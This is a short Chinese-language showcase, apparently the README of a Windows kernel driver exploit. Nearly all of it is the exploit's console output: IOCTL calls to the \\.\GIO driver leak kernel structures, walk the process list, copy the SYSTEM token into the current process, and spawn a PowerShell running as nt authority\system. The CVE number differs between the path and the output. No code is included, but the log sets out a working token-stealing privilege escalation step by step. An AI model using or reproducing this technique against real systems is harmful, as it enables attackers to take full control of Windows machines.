仅仅因为你的目标内存不安全,并不代表你的漏洞利用也必须不安全!
使用的漏洞:
测试环境:
Windows 10 Kernel Version 19041 MP (1 procs) Free x64.\CVE-2018-1932X.exe
PS Z:\CVE-2018-1932X\target\debug> .\CVE-2018-1932X.exe
CVE-2019-1932X
打开内核驱动句柄:\\.\GIO
获取句柄:0xa8
发送 IOCTL:0xc3502580,数据长度为 0x10 字节
[+] 泄露的 _KPCR:ffffe48159d88000
[*] 地址 _KPCRB:ffffe48159d88020
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
[+] 泄露的 _KPRCB:ffffe48159d88180
[*] 地址 _KTHREAD:ffffe48159d88188
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
[+] 泄露的 _KTHREAD:ffffb50b14d16080
[*] 地址 _KPROCESS:ffffb50b14d162a0
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
[+] 泄露的 _KPROCESS:ffffb50b1507f080
[*] 地址 PID:ffffb50b1507f4c0
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
[+] 泄露的 PID:2092
[+] 已知 PID:2092
遍历活动进程链接...
[*] 地址 ActiveProcessLinks.Flink:ffffb50b1507f4c8 (PID: 82c)
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
[+] 泄露的 _EPROCESS:fffff8015561e060 (PID: 0)
[*] 地址 ActiveProcessLinks.Flink:fffff8015561e060 (PID: 0)
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
[+] 泄露的 _EPROCESS:ffffb50b100624c8 (PID: 4)
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
[+] 当前令牌:ffff9708cac8306e
[+] 系统令牌:ffff9708c567b047
借用 SYSTEM 令牌...
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
发送 IOCTL:0xc3502808,数据长度为 0x14 字节
[+] 当前令牌:ffff9708c567b047
生成进程...
[+] 已生成 SYSTEM 进程
关闭内核驱动句柄:\\.\GIO
生成的 Powershell:
PS C:\> whoami
nt authority\system

